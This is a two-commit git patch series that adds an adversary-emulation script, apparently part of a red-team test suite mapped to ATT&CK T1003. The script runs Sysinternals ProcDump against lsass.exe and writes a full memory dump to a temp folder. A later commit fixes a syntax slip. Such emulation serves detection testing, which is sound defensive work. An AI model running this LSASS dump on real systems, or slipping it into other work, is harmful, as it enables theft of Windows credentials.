From 2721f150d055a9cc0d34595c3662fba35c3da885 Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Thu, 10 Jan 2019 17:46:45 -0600 Subject: [PATCH 1/2] t1003 - Dump LSASS with ProcDump --- README.md | 2 +- red_ttp/common.py | 1 + red_ttp/lsass_memory_dump.py | 40 ++++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 1 deletion(-) create mode 100644 red_ttp/lsass_memory_dump.py diff --git a/README.md b/README.md index 91a002d..aa09823 100755 --- a/README.md +++ b/README.md @@ -24,7 +24,7 @@ The following table provides dependency information: | Dependency | RTAs | source | | --- | --- | --- | -| Sysinternals Suite | user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) | +| Sysinternals Suite | lsass_memory_dump.py, user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) | | MsXsl | msxsl_network.py | [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=21714) | diff --git a/red_ttp/common.py b/red_ttp/common.py index c7c8213..bc2f896 100755 --- a/red_ttp/common.py +++ b/red_ttp/common.py @@ -313,6 +313,7 @@ def check_system(): PS_EXEC = get_path("bin", "PsExec.exe") +PROCDUMP = get_path("bin", "procdump.exe") def run_system(arguments=None): diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py new file mode 100644 index 0000000..8647351 --- /dev/null +++ b/red_ttp/lsass_memory_dump.py @@ -0,0 +1,40 @@ +# Name: Dump LSASS Memory with ProcDump +# RTA: lsass_memory_dump.py +# ATT&CK: T1003 +# Description: Uses Sysinternals ProcDump to dump the memory space of lsass.exe. + +import common +import os +import errno + +DUMPFILE = "C:\Windows\Temp\RTA\lsass.dmp" +@common.dependencies(common.PROCDUMP) +def main(): + + common.log("Ensuring dump folder exists...") + if os.path.exists(os.path.dirname(DUMPFILE)): + common.log("Dump folder exists, moving on!") + else: + common.log("Dump folder doesn't exist, creating...") + try: + os.makedirs(os.path.dirname(DUMPFILE)) + except OSError as e: + if e.errno != errno.EEXIST: + common.log("Failed to create dump folder!") + raise + + common.log("Executing procdump.exe...") + code, output = common.execute([@common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE]) + + if code == 0: + common.log("Successfully executed procdump.exe!") + else: + common.log("Failed to execute procdump.exe.") + + if os.path.exists(DUMPFILE): + common.log("Successfully created " + DUMPFILE) + else: + common.log ("Failed to create " + DUMPFILE) + +if __name__ == "__main__": + exit(main()) From 6617247e04fab385f06912565b53b6a8db84127d Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Sun, 13 Jan 2019 18:01:47 -0600 Subject: [PATCH 2/2] Fix syntax issue --- red_ttp/lsass_memory_dump.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py index 8647351..f50547d 100644 --- a/red_ttp/lsass_memory_dump.py +++ b/red_ttp/lsass_memory_dump.py @@ -24,7 +24,7 @@ def main(): raise common.log("Executing procdump.exe...") - code, output = common.execute([@common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE]) + code, output = common.execute([common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE]) if code == 0: common.log("Successfully executed procdump.exe!")